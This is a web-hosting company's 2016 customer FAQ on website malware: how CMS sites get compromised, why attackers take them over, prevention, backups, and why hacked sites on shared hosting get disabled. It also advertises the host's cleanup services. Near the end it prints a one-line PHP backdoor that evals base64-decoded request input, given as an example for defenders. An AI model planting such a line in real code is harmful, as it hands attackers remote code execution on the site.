14th April, 2016
Ive just recieved notification of malware on my site, what does it mean?
This essentially means that your websites security has been compromised and malicious files uploaded to your sites folders. Once those files have been uploaded, then they’ve probably been run automatically. This usually results in more files being downloaded to your sites folders and further code injected into your files. Code would be injected into your site so as to provide further access to the site if the initial vulnerability is detected and secured, known as a ‘backdoor’.
How did this happen?
Websites are now mostly built on Content Management Systems (CMS) like WordPress or Joomla, to name the most popular two. These are programs that provide a framework which you can build a website on. These CMSs use Themes and Plugins to further customise the site to get the look and operation you want. As the code on these matures, more and more vulnerabilities are discovered. These vulnerabilities are then exploited to upload or inject code into your site so they can access your site.
Why do they do this?
There are many reasons, but mostly, it allows access to a server for free. This allows them to use the server to send spam mail, use the server to participate in a DDoS attack, attempt to hack another server etc etc. This is now quite a large illegal industry.
What should I do to prevent this from happening?
Keep your sites code (Core, Themes, plugins) up to date, this ensures that at least older vulnerabilities are patched and secured. If you are not the sites developer then put a service contract in place to manage updates for your site with your developer.
If your site is important to your business then use a proxy firewall, we recommend using CloudProxy http://www.myhost.ie/hosting/website-firewall/ This routes all traffic to your site via their servers where they can filter out malicious requests etc, it also secures your site against outdated code as it virtually patches your sites code so it seems up to date to any would be attacker.
What to do if my site is hacked?
Always have a backup of your site. We cannot stress this enough. We do backup our servers on a 7 day rolling backup system, however your site may have been compromised for some time before it was noticed which renders our backups useless to you. We do offer a backup service for clients who wish to maintain backups over a longer time period, please contact firstname.lastname@example.org regarding this.
If you don’t have access to a known clean backup of your site we would recommend using the Malware Removal Service described here: http://www.myhost.ie/hosting/malware-removal/
This is a year long product that scans all your files and database and removes any malware code that was injected to them. A scan is run daily on your site and any malware detection’s are reported to us and cleaned. You would be notified once the site is cleaned with the list of infected files and recommended steps to secure the site. We would limit access to your site so that no further malware can be uploaded. Once they have cleaned your site, we can give access to you or your developer to update and secure the site before releasing it to the public.
If your site has been compromised and you do not have a known clean backup, then we would recommend the Malware Removal Service. Updating a site that has already been compromised, without taking appropriate steps, is a waste of time and effort and usually results in the site being hacked again via a backdoor left on the site from the initial compromise.
Why was my site disabled?
This is not a step we take lightly, however if your site is on shared hosting and is compromised then we have no option but to protect the servers reputation and in turn the reputation of our other clients websites. On a shared server you are sharing the IP address with the other sites on that server. If that IP address gets blacklisted then all the clients websites on that IP address are also blacklisted. Disabling access to a site does two things, it prevents the malware uploaded to your site from being used to carry out further attacks or send spam, which would result in the servers IP address being blacklisted, and it also prevents your site from being further compromised.
What does malware look like?
An example of a backdoor:
$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;
This single line of code is found in file added to the sites code by hackers, frequently disguised as part of a plugin or a theme. When the file is requested they can execute any php code contained in the variable ‘e’ on the site. So if you have a site that has a few hundred php files, you can imagine trying to find that one line. This is why we recomend using http://www.myhost.ie/hosting/malware-removal/
To avoid the expense and pain of having to deal with malware on your site, keep it up to date (core, themes and plugins etc) and keep a known clean backup of your site. If you want us to look after your backups for you then contact email@example.com and we can proivide you with a few solutions.